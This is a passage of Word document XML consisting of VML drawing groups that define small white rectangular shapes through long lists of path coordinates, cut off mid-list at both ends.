323,2488,8323,2486,8323,2485,8323,2484,8323,2483,8323,2481,8323,2480,8323,2479,8323,2477,8323,2476,8323,2475,8323,2473,8323,2472,8323,2470,8323,2468,8323,2467,8323,2465,8323,2463,8323,2462,8323,2460,8323,2458,8323,2456,8323,2454,8323,2452,8323,2450,8323,2448,8323,2446,8323,2444,8323,2442,8323,2440,8323,2437,8323,2435,8323,2433,8323,2430,8323,2428,8323,2426,8323,2423,8323,2420,8323,2418,8323,2415,8323,2412,8323,2410,8323,2407,8323,2404,8323,2401,8323,2398,8323,2395,8323,2395,8323,2395,8323,2395,8323,2395,8323,2395,8323,2395,8323,2395,8323,2395,8323,2395,8323,2395,8323,2395,8323,2395,8323,2395,8323,2395,8323,2395,8323,2395,8323,2395,8323,2395,8322,2395,8322,2395,8322,2395,8322,2395,8322,2395,8322,2395,8321,2395,8321,2395,8321,2395,8321,2395,8320,2395,8320,2395,8319,2395,8319,2395,8319,2395,8318,2395,8318,2395,8317,2395,8317,2395,8316,2395,8316,2395,8315,2395,8314,2395,8314,2395,8313,2395,8312,2395,8311,2395,8310,2395,8309,2395,8308,2395,8307,2395,8306,2395,8305,2395,8304,2395,8303,2395,8302,2395,8301,2395,8299,2395,8298,2395,8297,2395,8295,2395,8294,2395,8292,2395,8290,2395,8289,2395,8287,2395,8285,2395,8284,2395,8282,2395,8280,2395,8278,2395,8276,2395,8273,2395,8271,2395,8269,2395,8267,2395,8264,2395,8262,2395,8259,2395,8257,2395,8254,2395,8251,2395,8249,2395,8246,2395,8243,2395,8240,2395,8237,2395,8233,2395,8230,2395,8227,2395,8223,2395,8220,2395,8216,2395,8213,2395,8209,2395,8205,2395,8201,2395,8197,2395,8193,2395,8189,2395,8185,2395,8181,2395,8176,2395,8172,2395,8167,2395,8163,2395,8158,2395,8153,2395,8148,2395,8143,2395,8138,2395,8132,2395,8127,2395,8122,2395,8116,2395,8110,2395,8105,2395,8099,2395,8093,2395,8087,2395,8081,2395,8074,2395,8068e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:142.500pt;margin-top:402.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2850,8050" coordsize="130,270">
        <v:shape style="position:absolute;left:2850;top:8050;width:130;height:270" coordorigin="2850,8050" coordsize="130,270" path="m2875,8068l2875,8068,2875,8068,2875,8068,2875,8068,2875,8068,2875,8068,2875,8068,2875,8068,2875,8068,2875,8068,2876,8068,2876,8068,2876,8068,2876,8068,2876,8068,2876,8068,2876,8068,2876,8068,2876,8068,2876,8068,2876,8068,2876,8068,2876,8068,2876,8068,2876,8068,2877,8068,2877,8068,2877,8068,2877,8068,2877,8068,2877,8068,2878,8068,2878,8068,2878,8068,2878,8068,2879,8068,2879,8068,2879,8068,2879,8068,2880,8068,2880,8068,2880,8068,2881,8068,2881,8068,2882,8068,2882,8068,2882,8068,2883,8068,2883,8068,2884,8068,2884,8068,2885,8068,2885,8068,2886,8068,2887,8068,2887,8068,2888,8068,2889,8068,2889,8068,2890,8068,2891,8068,2892,8068,2892,8068,2893,8068,2894,8068,2895,8068,2896,8068,2897,8068,2898,8068,2899,8068,2900,8068,2901,8068,2902,8068,2903,8068,2904,8068,2906,8068,2907,8068,2908,8068,2909,8068,2911,8068,2912,8068,2913,8068,2915,8068,2916,8068,2918,8068,2919,8068,2921,8068,2922,8068,2924,8068,2926,8068,2927,8068,2929,8068,2931,8068,2933,8068,2935,8068,2937,8068,2938,8068,2940,8068,2943,8068,2945,8068,2947,8068,2949,8068,2951,8068,2953,8068,2956,8068,2958,8068,2960,8068,2963,8068,2965,8068,2968,8068,2970,8068,2973,8068,2976,8068,2978,8068,2981,8068,2984,8068,2987,8068,2990,8068,2993,8068,2996,8068,2996,8068,2996,8068,2996,8068,2996,8068,2996,8068,2996,8068,2996,8068,2996,8068,2996,8068,2996,8068,2996,8068,2996,8068,2996,8068,2996,8068,2996,8068,2996,8069,2996,8069,2996,8069,2996,8069,2996,8069,2996,8069,2996,8069,2996,8070,2996,8070,2996,8070,2996,8070,2996,8071,2996,8071,2996,8071,2996,8072,2996,8072,2996,8073,2996,8073,2996,8074,2996,8074,2996,8075,2996,8075,2996,8076,2996,8076,2996,8077,2996,8078,2996,8078,2996,8079,2996,8080,2996,8081,2996,8082,2996,8083,2996,8084,2996,8085,2996,8086,2996,8087,2996,8088,2996,8089,2996,8091,2996,8092,2996,8093,2996,8095,2996,8096,2996,8098,2996,8099,2996,8101,2996,8102,2996,8104,2996,8106,2996,8108,2996,8110,2996,8112,2996,8114,2996,8116,2996,8118,2996,8120,2996,8122,2996,8125,2996,8127,2996,8129,2996,8132,2996,8135,2996,8137,2996,8140,2996,8143,2996,8146,2996,8149,2996,8152,2996,8155,2996,8158,2996,8161,2996,8164,2996,8168,2996,8171,2996,8175,2996,8178,2996,8182,2996,8186,2996,8190,2996,8194,2996,8198,2996,8202,2996,8206,2996,8211,2996,8215,2996,8219,2996,8224,2996,8229,2996,8233,2996,8238,2996,8243,2996,8248,2996,8254,2996,8259,2996,8264,2996,8270,2996,8275,2996,8281,2996,8287,2996,8292,2996,8298,2996,8304,2996,8311,2996,8317,2996,8323,2996,8323,2996,8323,2996,8323,2996,8323,2996,8323,2995,8323,2995,8323,2995,8323,2995,8323,2995,8323,2995,8323,2995,8323,2995,8323,2995,8323,2995,8323,2995,8323,2995,8323,2995,8323,2995,8323,2995,8323,2995,8323,2995,8323,2995,8323,2995,8323,2995,8323,2994,8323,2994,8323,2994,8323,2994,8323,2994,8323,2994,8323,2993,8323,2993,8323,2993,8323,2993,8323,2992,8323,2992,8323,2992,8323,2992,8323,2991,8323,2991,8323,2991,8323,2990,8323,2990,8323,2989,8323,2989,8323,2989,8323,2988,8323,2988,8323,2987,8323,2987,8323,2986,8323,2985,8323,2985,8323,2984,8323,2984,8323,2983,8323,2982,8323,2982,8323,2981,8323,2980,8323,2979,8323,2979,8323,2978,8323,2977,8323,2976,8323,2975,8323,2974,8323,2973,8323,2972,8323,2971,8323,2970,8323,2969,8323,2968,8323,2967,8323,2965,8323,2964,8323,2963,8323,2962,8323,2960,8323,2959,8323,2958,8323,2956,8323,2955,8323,2953,8323,2952,8323,2950,8323,2949,8323,2947,8323,2945,8323,2944,8323,2942,8323,2940,8323,2938,8323,2936,8323,2934,8323,2932,8323,2930,8323,2928,8323,2926,8323,2924,8323,2922,8323,2920,8323,2918,8323,2915,8323,2913,8323,2911,8323,2908,8323,2906,8323,2903,8323,2901,8323,2898,8323,2895,8323,2893,8323,2890,8323,2887,8323,2884,8323,2881,8323,2878,8323,2875,8323,2875,8323,2875,8323,2875,8323,2875,8323,2875,8323,2875,8323,2875,8323,2875,8323,2875,8323,2875,8323,2875,8323,2875,8323,2875,8323,2875,8323,2875,8323,2875,8323,2875,8323,2875,8322,2875,8322,2875,8322,2875,8322,2875,8322,2875,8322,2875,8321,2875,8321,2875,8321,2875,8321,2875,8320,2875,8320,2875,8319,2875,8319,2875,8319,2875,8318,2875,8318,2875,8317,2875,8317,2875,8316,2875,8316,2875,8315,2875,8314,2875,8314,2875,8313,2875,8312,2875,8311,2875,8310,2875,8309,2875,8308,2875,8307,2875,8306,2875,8305,2875,8304,2875,8303,2875,8302,2875,8301,2875,8299,2875,8298,2875,8297,2875,8295,2875,8294,2875,8292,2875,8290,2875,8289,2875,8287,2875,8285,2875,8284,2875,8282,2875,8280,2875,8278,2875,8276,2875,8273,2875,8271,2875,8269,2875,8267,2875,8264,2875,8262,2875,8259,2875,8257,2875,8254,2875,8251,2875,8249,2875,8246,2875,8243,2875,8240,2875,8237,2875,8233,2875,8230,2875,8227,2875,8223,2875,8220,2875,8216,2875,8213,2875,8209,2875,8205,2875,8201,2875,8197,2875,8193,2875,8189,2875,8185,2875,8181,2875,8176,2875,8172,2875,8167,2875,8163,2875,8158,2875,8153,2875,8148,2875,8143,2875,8138,2875,8132,2875,8127,2875,8122,2875,8116,2875,8110,2875,8105,2875,8099,2875,8093,2875,8087,2875,8081,2875,8074,2875,8068e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:118.500pt;margin-top:433.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2370,8670" coordsize="130,270">
        <v:shape style="position:absolute;left:2370;top:8670;width:130;height:270" coordorigin="2370,8670" coordsize="130,270" path="m2395,8698l2395,8698,2395,8698,2395,8698,2395,8698,2395,8698,2395,8698,2395,8698,2395,8698,2395,8698,2395,8698,2395,8698,2395,8698,2395,8698,2395,8698,2395,8698,2395,8698,2395,8698,2396,8698,2396,8698,2396,8698,2396,8698,2396,8698,2396,8698,2396,8698,2396,8698,2396,8698,2396,8698,2397,8698,2397,8698,2397,8698,2397,8698,2397,8698,2398,8698,2398,8698,2398,8698,2398,8698,2399,8698,2399,8698,2399,8698,2399,8698,2400,8698,2400,8698,2400,8698,2401,8698,2401,8698,2402,8698,2402,8698,2403,8698,2403,8698,2404,8698,2404,8698,2405,8698,2405,8698,2406,8698,2406,8698,2407,8698,2408,8698,2408,8698,2409,8698,2410,8698,2411,8698,2411,8698,2412,8698,2413,8698,2414,8698,2415,8698,2416,8698,2417,8698,2418,8698,2419,8698,2420,8698,2421,8698,2422,8698,2423,8698,2424,8698,2425,8698,2426,8698,2428,8698,2429,8698,2430,8698,2432,8698,2433,8698,2434,8698,2436,8698,2437,8698,2439,8698,2441,8698,2442,8698,2444,8698,2445,8698,2447,8698,2449,8698,2451,8698,2453,8698,2454,8698,2456,8698,2458,8698,2460,8698,2462,8698,2464,8698,2466,8698,2469,8698,2471,8698,2473,8698,2475,8698,2478,8698,2480,8698,2482,8698,2485,8698,2487,8698,2490,8698,2493,8698,2495,8698,2498,8698,2501,8698,2504,8698,2506,8698,2509,8698,2512,8698,2515,8698,2515,8698,2515,8698,2515,8698,2515,8698,2515,8698,2515,8698,2515,8698,2515,8698,2515,8698,2515,8698,2515,8699,2515,8699,2515,8699,2515,8699,2515,8699,2515,8699,2515,8699,2515,8699,2515,8699,2515,8699,2515,8700,2515,8700,2515,8700,2515,8700,2515,8700,2515,8701,2515,8701,2515,8701,2515,8702,2515,8702,2515,8702,2515,8703,2515,8703,2515,8704,2515,8704,2515,8705,2515,8705,2515,8706,2515,8707,2515,8707,2515,8708,2515,8709,2515,8710,2515,8710,2515,8711,2515,8712,2515,8713,2515,8714,2515,8715,2515,8716,2515,8717,2515,8718,2515,8720,2515,8721,2515,8722,2515,8724,2515,8725,2515,8726,2515,8728,2515,8729,2515,8731,2515,8733,2515,8734,2515,8736,2515,8738,2515,8740,2515,8742,2515,8744,2515,8746,2515,8748,2515,8750,2515,8753,2515,8755,2515,8757,2515,8760,2515,8762,2515,8765,2515,8767,2515,8770,2515,8773,2515,8776,2515,8779,2515,8782,2515,8785,2515,8788,2515,8791,2515,8795,2515,8798,2515,8802,2515,8805,2515,8809,2515,8812,2515,8816,2515,8820,2515,8824,2515,8828,2515,8832,2515,8837,2515,8841,2515,8845,2515,8850,2515,8854,2515,8859,2515,8864,2515,8869,2515,8874,2515,8879,2515,8884,2515,8889,2515,8894,2515,8900,2515,8905,2515,8911,2515,8917,2515,8923,2515,8929,2515,8935,2515,8941,2515,8947,2515,8954,2515,8954,2515,8954,2515,8954,2515,8954,2515,8954,2515,8954,2515,8954,2515,8954,2515,8954,2515,8954,2515,8954,2515,8954,2515,8954,2515,8954,2515,8954,2515,8954,2515,8954,2515,8954,2515,8954,2515,8954,2515,8954,2515,8954,2515,8954,2514,8954,2514,8954,2514,8954,2514,8954,2514,8954,2514,8954,2514,8954,2513,8954,2513,8954,2513,8954,2513,8954,2512,8954,2512,8954,2512,8954,2512,8954,2511,8954,2511,8954,2511,8954,2510,8954,2510,8954,2510,8954,2509,8954,2509,8954,2508,8954,2508,8954,2507,8954,2507,8954,2506,8954,2506,8954,2505,8954,2505,8954,2504,8954,2503,8954,2503,8954,2502,8954,2501,8954,2501,8954,2500,8954,2499,8954,2498,8954,2497,8954,2497,8954,2496,8954,2495,8954,2494,8954,2493,8954,2492,8954,2491,8954,2490,8954,2489,8954,2488,8954,2486,8954,2485,8954,2484,8954,2483,8954,2481,8954,2480,8954,2479,8954,2477,8954,2476,8954,2475,8954,2473,8954,2472,8954,2470,8954,2468,8954,2467,8954,2465,8954,2463,8954,2462,8954,2460,8954,2458,8954,2456,8954,2454,8954,2452,8954,2450,8954,2448,8954,2446,8954,2444,8954,2442,8954,2440,8954,2437,8954,2435,8954,2433,8954,2430,8954,2428,8954,2426,8954,2423,8954,2420,8954,2418,8954,2415,8954,2412,8954,2410,8954,2407,8954,2404,8954,2401,8954,2398,8954,2395,8954,2395,8954,2395,8954,2395,8954,2395,8954,2395,8953,2395,8953,2395,8953,2395,8953,2395,8953,2395,8953,2395,8953,2395,8953,2395,8953,2395,8953,2395,8953,2395,8953,2395,8953,2395,8953,2395,8953,2395,8952,2395,8952,2395,8952,2395,8952,2395,8952,2395,8951,2395,8951,2395,8951,2395,8951,2395,8950,2395,8950,2395,8949,2395,8949,2395,8949,2395,8948,2395,8948,2395,8947,2395,8946,2395,8946,2395,8945,2395,8945,2395,8944,2395,8943,2395,8942,2395,8941,2395,8941,2395,8940,2395,8939,2395,8938,2395,8937,2395,8936,2395,8935,2395,8933,2395,8932,2395,8931,2395,8930,2395,8928,2395,8927,2395,8925,2395,8924,2395,8922,2395,8921,2395,8919,2395,8917,2395,8916,2395,8914,2395,8912,2395,8910,2395,8908,2395,8906,2395,8904,2395,8902,2395,8899,2395,8897,2395,8895,2395,8892,2395,8890,2395,8887,2395,8884,2395,8882,2395,8879,2395,8876,2395,8873,2395,8870,2395,8867,2395,8864,2395,8861,2395,8857,2395,8854,2395,8850,2395,8847,2395,8843,2395,8839,2395,8836,2395,8832,2395,8828,2395,8824,2395,8820,2395,8815,2395,8811,2395,8807,2395,8802,2395,8798,2395,8793,2395,8788,2395,8783,2395,8778,2395,8773,2395,8768,2395,8763,2395,8757,2395,8752,2395,8746,2395,8741,2395,8735,2395,8729,2395,8723,2395,8717,2395,8711,2395,8705,2395,8698e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:142.500pt;margin-top:433.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2850,8670" coordsize="130,270">
        <v:shape style="position:absolute;left:2850;top:8670;width:130;height:270" coordorigin="2850,8670" coordsize="130,270" path="m2875,8698l2875,8698,2875,8698,2875,8698,2875,8698,2875,8698,2875,8698,2875,8698,2875,8698,2875,8698,2875,8698,2876,8698,2876,8698,2876,8698,2876,8698,2876,8698,2876,8698,2876,8698,2876,8698,2876,8698,2876,8698,2876,8698,2876,8698,2876,8698,2876,8698,2876,8698,2877,8698,2877,8698,2877,8698,2877,8698,2877,8698,2877,8698,2878,8698,2878,8698,2878,8698,2878,8698,2879,8698,2879,8698,2879,8698,2879,8698,2880,8698,2880,8698,2880,8698,2881,8698,2881,8698,2882,8698,2882,8698,2882,8698,2883,8698,2883,8698,2884,8698,2884,8698,2885,8698,2885,8698,2886,8698,2887,8698,2887,8698,2888,8698,2889,8698,2889,8698,2890,8698,2891,8698,2892,8698,2892,8698,2893,8698,2894,8698,2895,8698,2896,8698,2897,8698,2898,8698,2899,8698,2900,8698,2901,8698,2902,8698,2903,8698,2904,8698,2906,8698,2907,8698,2908,8698,2909,8698,2911,8698,2912,8698,2913,8698,2915,8698,2916,8698,2918,8698,2919,8698,2921,8698,2922,8698,2924,8698,2926,8698,2927,8698,2929,8698,2931,8698,2933,8698,2935,8698,2937,8698,2938,8698,2940,8698,2943,8698,2945,8698,2947,8698,2949,8698,2951,8698,2953,8698,2956,8698,2958,8698,2960,8698,2963,8698,2965,8698,2968,8698,2970,8698,2973,8698,2976,8698,2978,8698,2981,8698,2984,8698,2987,8698,2990,8698,2993,8698,2996,8698,2996,8698,2996,8698,2996,8698,2996,8698,2996,8698,2996,8698,2996,8698,2996,8698,2996,8698,2996,8698,2996,8699,2996,8699,2996,8699,2996,8699,2996,8699,2996,8699,2996,8699,2996,8699,2996,8699,2996,8699,2996,8700,2996,8700,2996,8700,2996,8700,2996,8700,2996,8701,2996,8701,2996,8701,2996,8702,2996,8702,2996,8702,2996,8703,2996,8703,2996,8704,2996,8704,2996,8705,2996,8705,2996,8706,2996,8707,2996,8707,2996,8708,2996,8709,2996,8710,2996,8710,2996,8711,2996,8712,2996,8713,2996,8714,2996,8715,2996,8716,2996,8717,2996,8718,2996,8720,2996,8721,2996,8722,2996,8724,2996,8725,2996,8726,2996,8728,2996,8729,2996,8731,2996,8733,2996,8734,2996,8736,2996,8738,2996,8740,2996,8742,2996,8744,2996,8746,2996,8748,2996,8750,2996,8753,2996,8755,2996,8757,2996,8760,2996,8762,2996,8765,2996,8767,2996,8770,2996,8773,2996,8776,2996,8779,2996,8782,2996,8785,2996,8788,2996,8791,2996,8795,2996,8798,2996,8802,2996,8805,2996,8809,2996,8812,2996,8816,2996,8820,2996,8824,2996,8828,2996,8832,2996,8837,2996,8841,2996,8845,2996,8850,2996,8854,2996,8859,2996,8864,2996,8869,2996,8874,2996,8879,2996,8884,2996,8889,2996,8894,2996,8900,2996,8905,2996,8911,2996,8917,2996,8923,2996,8929,2996,8935,2996,8941,2996,8947,2996,8954,2996,8954,2996,8954,2996,8954,2996,8954,2996,8954,2995,8954,2995,8954,2995,8954,2995,8954,2995,8954,2995,8954,2995,8954,2995,8954,2995,8954,2995,8954,2995,8954,2995,8954,2995,8954,2995,8954,2995,8954,2995,8954,2995,8954,2995,8954,2995,8954,2995,8954,2994,8954,2994,8954,2994,8954,2994,8954,2994,8954,2994,8954,2993,8954,2993,8954,2993,8954,2993,8954,2992,8954,2992,8954,2992,8954,2992,8954,2991,8954,2991,8954,2991,8954,2990,8954,2990,8954,2989,8954,2989,8954,2989,8954,2988,8954,2988,8954,2987,8954,2987,8954,2986,8954,2985,8954,2985,8954,2984,8954,2984,8954,2983,8954,2982,8954,2982,8954,2981,8954,2980,8954,2979,8954,2979,8954,2978,8954,2977,8954,2976,8954,2975,8954,2974,8954,2973,8954,2972,8954,2971,8954,2970,8954,2969,8954,2968,8954,2967,8954,2965,8954,2964,8954,2963,8954,2962,8954,2960,8954,2959,8954,2958,8954,2956,8954,2955,8954,2953,8954,2952,8954,2950,8954,2949,8954,2947,8954,2945,8954,2944,8954,2942,8954,2940,8954,2938,8954,2936,8954,2934,8954,2932,8954,2930,8954,2928,8954,2926,8954,2924,8954,2922,8954,2920,8954,2918,8954,2915,8954,2913,8954,2911,8954,2908,8954,2906,8954,2903,8954,2901,8954,2898,8954,2895,8954,2893,8954,2890,8954,2887,8954,2884,8954,2881,8954,2878,8954,2875,8954,2875,8954,2875,8954,2875,8954,2875,8954,2875,8953,2875,8953,2875,8953,2875,8953,2875,8953,2875,8953,2875,8953,2875,8953,2875,8953,2875,8953,2875,8953,2875,8953,2875,8953,2875,8953,2875,8953,2875,8952,2875,8952,2875,8952,2875,8952,2875,8952,2875,8951,2875,8951,2875,8951,2875,8951,2875,8950,2875,8950,2875,8949,2875,8949,2875,8949,2875,8948,2875,8948,2875,8947,2875,8946,2875,8946,2875,8945,2875,8945,2875,8944,2875,8943,2875,8942,2875,8941,2875,8941,2875,8940,2875,8939,2875,8938,2875,8937,2875,8936,2875,8935,2875,8933,2875,8932,2875,8931,2875,8930,2875,8928,2875,8927,2875,8925,2875,8924,2875,8922,2875,8921,2875,8919,2875,8917,2875,8916,2875,8914,2875,8912,2875,8910,2875,8908,2875,8906,2875,8904,2875,8902,2875,8899,2875,8897,2875,8895,2875,8892,2875,8890,2875,8887,2875,8884,2875,8882,2875,8879,2875,8876,2875,8873,2875,8870,2875,8867,2875,8864,2875,8861,2875,8857,2875,8854,2875,8850,2875,8847,2875,8843,2875,8839,2875,8836,2875,8832,2875,8828,2875,8824,2875,8820,2875,8815,2875,8811,2875,8807,2875,8802,2875,8798,2875,8793,2875,8788,2875,8783,2875,8778,2875,8773,2875,8768,2875,8763,2875,8757,2875,8752,2875,8746,2875,8741,2875,8735,2875,8729,2875,8723,2875,8717,2875,8711,2875,8705,2875,8698e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:118.500pt;margin-top:466.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2370,9330" coordsize="130,250">
        <v:shape style="position:absolute;left:2370;top:9330;width:130;height:250" coordorigin="2370,9330" coordsize="130,250" path="m2395,9344l2395,9344,2395,9344,2395,9344,2395,9344,2395,9344,2395,9344,2395,9344,2395,9344,2395,9344,2395,9344,2395,9344,2395,9344,2395,9344,2395,9344,2395,9344,2395,9344,2395,9344,2396,9344,2396,9344,2396,9344,2396,9344,2396,9344,2396,9344,2396,9344,2396,9344,2396,9344,2396,9344,2397,9344,2397,9344,2397,9344,2397,9344,2397,9344,2398,9344,2398,9344,2398,9344,2398,9344,2399,9344,2399,9344,2399,9344,2399,9344,2400,9344,2400,9344,2400,9344,2401,9344,2401,9344,2402,9344,2402,9344,2403,9344,2403,9344,2404,9344,2404,9344,2405,9344,2405,9344,2406,9344,2406,9344,2407,9344,2408,9344,2408,9344,2409,9344,2410,9344,2411,9344,2411,9344,2412,9344,2413,9344,2414,9344,2415,9344,2416,9344,2417,9344,2418,9344,2419,9344,2420,9344,2421,9344,2422,9344,2423,9344,2424,9344,2425,9344,2426,9344,2428,9344,2429,9344,2430,9344,2432,9344,2433,9344,2434,9344,2436,9344,2437,9344,2439,9344,2441,9344,2442,9344,2444,9344,2445,9344,2447,9344,2449,9344,2451,9344,2453,9344,2454,9344,2456,9344,2458,9344,2460,9344,2462,9344,2464,9344,2466,9344,2469,9344,2471,9344,2473,9344,2475,9344,2478,9344,2480,9344,2482,9344,2485,9344,2487,9344,2490,9344,2493,9344,2495,9344,2498,9344,2501,9344,2504,9344,2506,9344,2509,9344,2512,9344,2515,9344,2515,9344,2515,9344,2515,9344,2515,9344,2515,9344,2515,9344,2515,9344,2515,9344,2515,9344,2515,9344,2515,9344,2515,9344,2515,9344,2515,9344,2515,9344,2515,9344,2515,9344,2515,9344,2515,9345,2515,9345,2515,9345,2515,9345,2515,9345,2515,9346,2515,9346,2515,9346,2515,9346,2515,9347,2515,9347,2515,9347,2515,9348,2515,9348,2515,9349,2515,9349,2515,9350,2515,9350,2515,9351,2515,9351,2515,9352,2515,9353,2515,9353,2515,9354,2515,9355,2515,9356,2515,9357,2515,9357,2515,9358,2515,9359,2515,9360,2515,9362,2515,9363,2515,9364,2515,9365,2515,9366,2515,9368,2515,9369,2515,9370,2515,9372,2515,9373,2515,9375,2515,9376,2515,9378,2515,9380,2515,9382,2515,9383,2515,9385,2515,9387,2515,9389,2515,9391,2515,9393,2515,9396,2515,9398,2515,9400,2515,9403,2515,9405,2515,9408,2515,9410,2515,9413,2515,9416,2515,9418,2515,9421,2515,9424,2515,9427,2515,9430,2515,9433,2515,9437,2515,9440,2515,9443,2515,9447,2515,9450,2515,9454,2515,9458,2515,9462,2515,9465,2515,9469,2515,9474,2515,9478,2515,9482,2515,9486,2515,9491,2515,9495,2515,9500,2515,9504,2515,9509,2515,9514,2515,9519,2515,9524,2515,9529,2515,9534,2515,9540,2515,9545,2515,9551,2515,9556,2515,9562,2515,9568,2515,9574,2515,9580,2515,9586,2515,9592,2515,9599,2515,9599,2515,9599,2515,9599,2515,9599,2515,9599,2515,9599,2515,9599,2515,9599,2515,9599,2515,9599,2515,9599,2515,9599,2515,9599,2515,9599,2515,9599,2515,9599,2515,9599,2515,9599,2515,9599,2515,9599,2515,9599,2515,9599,2515,9599,2514,9599,2514,9599,2514,9599,2514,9599,2514,9599,2514,9599,2514,9599,2513,9599,2513,9599,2513,9599,2513,9599,2512,9599,2512,9599,2512,9599,2512,9599,2511,9599,2511,9599,2511,9599,2510,9599,2510,9599,2510,9599,2509,9599,2509,9599,2508,9599,2508,9599,2507,9599,2507,9599,2506,9599,2506,9599,2505,9599,2505,9599,2504,9599,2503,9599,2503,9599,2502,9599,2501,9599,2501,9599,2500,9599,2499,9599,2498,9599,2497,9599,2497,9599,2496,9599,2495,9599,2494,9599,2493,9599,2492,9599,2491,9599,2490,9599,2489,9599,2488,9599,2486,9599,2485,9599,2484,9599,2483,9599,2481,9599,2480,9599,2479,9599,2477,9599,2476,9599,2475,9599,2473,9599,2472,9599,2470,9599,2468,9599,2467,9599,2465,9599,2463,9599,2462,9599,2460,9599,2458,9599,2456,9599,2454,9599,2452,9599,2450,9599,2448,9599,2446,9599,2444,9599,2442,9599,2440,9599,2437,9599,2435,9599,2433,9599,2430,9599,2428,9599,2426,9599,2423,9599,2420,9599,2418,9599,2415,9599,2412,9599,2410,9599,2407,9599,2404,9599,2401,9599,2398,9599,2395,9599,2395,9599,2395,9599,2395,9599,2395,9599,2395,9599,2395,9599,2395,9599,2395,9599,2395,9599,2395,9599,2395,9599,2395,9599,2395,9599,2395,9599,2395,9598,2395,9598,2395,9598,2395,9598,2395,9598,2395,9598,2395,9598,2395,9597,2395,9597,2395,9597,2395,9597,2395,9596,2395,9596,2395,9596,2395,9596,2395,9595,2395,9595,2395,9594,2395,9594,2395,9593,2395,9593,2395,9592,2395,9592,2395,9591,2395,9591,2395,9590,2395,9589,2395,9588,2395,9588,2395,9587,2395,9586,2395,9585,2395,9584,2395,9583,2395,9582,2395,9581,2395,9580,2395,9579,2395,9578,2395,9576,2395,9575,2395,9574,2395,9572,2395,9571,2395,9569,2395,9568,2395,9566,2395,9564,2395,9563,2395,9561,2395,9559,2395,9557,2395,9555,2395,9553,2395,9551,2395,9549,2395,9547,2395,9545,2395,9542,2395,9540,2395,9537,2395,9535,2395,9532,2395,9530,2395,9527,2395,9524,2395,9521,2395,9518,2395,9515,2395,9512,2395,9509,2395,9506,2395,9503,2395,9499,2395,9496,2395,9492,2395,9488,2395,9485,2395,9481,2395,9477,2395,9473,2395,9469,2395,9465,2395,9461,2395,9456,2395,9452,2395,9447,2395,9443,2395,9438,2395,9433,2395,9429,2395,9424,2395,9419,2395,9413,2395,9408,2395,9403,2395,9397,2395,9392,2395,9386,2395,9380,2395,9375,2395,9369,2395,9363,2395,9356,2395,9350,2395,9344e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:142.500pt;margin-top:466.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2850,9330" coordsize="130,250">
        <v:shape style="position:absolute;left:2850;top:9330;width:130;height:250" coordorigin="2850,9330" coordsize="130,250" path="m2875,9344l2875,9344,2875,9344,2875,9344,2875,9344,2875,9344,2875,9344,2875,9344,2875,9344,2875,9344,2875,9344,2876,9344,2876,9344,2876,9344,2876,9344,2876,9344,2876,9344,2876,9344,2876,9344,2876,9344,2876,9344,2876,9344,2876,9344,2876,9344,2876,9344,2876,9344,2877,9344,2877,9344,2877,9344,2877,9344,2877,9344,2877,9344,2878,9344,2878,9344,2878,9344,2878,9344,2879,9344,2879,9344,2879,9344,2879,9344,2880,9344,2880,9344,2880,9344,2881,9344,2881,9344,2882,9344,2882,9344,2882,9344,2883,9344,2883,9344,2884,9344,2884,9344,2885,9344,2885,9344,2886,9344,2887,9344,2887,9344,2888,9344,2889,9344,2889,9344,2890,9344,2891,9344,2892,9344,2892,9344,2893,9344,2894,9344,2895,9344,2896,9344,2897,9344,2898,9344,2899,9344,2900,9344,2901,9344,2902,9344,2903,9344,2904,9344,2906,9344,2907,9344,2908,9344,2909,9344,2911,9344,2912,9344,2913,9344,2915,9344,2916,9344,2918,9344,2919,9344,2921,9344,2922,9344,2924,9344,2926,9344,2927,9344,2929,9344,2931,9344,2933,9344,2935,9344,2937,9344,2938,9344,2940,9344,2943,9344,2945,9344,2947,9344,2949,9344,2951,9344,2953,9344,2956,9344,2958,9344,2960,9344,2963,9344,2965,9344,2968,9344,2970,9344,2973,9344,2976,9344,2978,9344,2981,9344,2984,9344,2987,9344,2990,9344,2993,9344,2996,9344,2996,9344,2996,9344,2996,9344,2996,9344,2996,9344,2996,9344,2996,9344,2996,9344,2996,9344,2996,9344,2996,9344,2996,9344,2996,9344,2996,9344,2996,9344,2996,9344,2996,9344,2996,9344,2996,9345,2996,9345,2996,9345,2996,9345,2996,9345,2996,9346,2996,9346,2996,9346,2996,9346,2996,9347,2996,9347,2996,9347,2996,9348,2996,9348,2996,9349,2996,9349,2996,9350,2996,9350,2996,9351,2996,9351,2996,9352,2996,9353,2996,9353,2996,9354,2996,9355,2996,9356,2996,9357,2996,9357,2996,9358,2996,9359,2996,9360,2996,9362,2996,9363,2996,9364,2996,9365,2996,9366,2996,9368,2996,9369,2996,9370,2996,9372,2996,9373,2996,9375,2996,9376,2996,9378,2996,9380,2996,9382,2996,9383,2996,9385,2996,9387,2996,9389,2996,9391,2996,9393,2996,9396,2996,9398,2996,9400,2996,9403,2996,9405,2996,9408,2996,9410,2996,9413,2996,9416,2996,9418,2996,9421,2996,9424,2996,9427,2996,9430,2996,9433,2996,9437,2996,9440,2996,9443,2996,9447,2996,9450,2996,9454,2996,9458,2996,9462,2996,9465,2996